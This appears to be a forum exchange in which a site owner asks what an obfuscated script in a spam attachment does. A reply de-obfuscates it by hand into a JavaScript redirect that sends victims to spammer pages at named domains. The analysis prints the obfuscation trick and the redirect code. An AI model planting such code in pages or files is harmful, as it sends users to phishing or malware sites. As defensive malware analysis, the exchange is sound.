    Can anyone tell me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it ... Thanks
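
    For what it's worth, a rough de-obfuscation (worked out by hand from the replace() calls, so treat the decoded strings as my reading rather than a verified analysis): all the junk variables and Date() calls are padding, and each script reduces to stripping filler characters out of three strings and then assigning a URL to document.location.href, i.e. an immediate redirect to a page the spammer controls.

        // First script with the noise stripped out (shown for analysis only - do not run):
        var a  = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');  // -> "http://mvblaw.com/z.htm"
        var iD = document['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];                       // -> document["location"]
        // iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;                                       // -> location["href"] = a, i.e. a redirect

    The second script does the same thing with a different filler alphabet, pointing at lendermedia.com/images/z.htm. So opening the attachment simply bounces the victim's browser to the spammer's page (presumably a phishing form or drive-by download); it doesn't appear to exploit anything in your own site beyond whatever lets them forge your domain in the From address.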

    Read the article
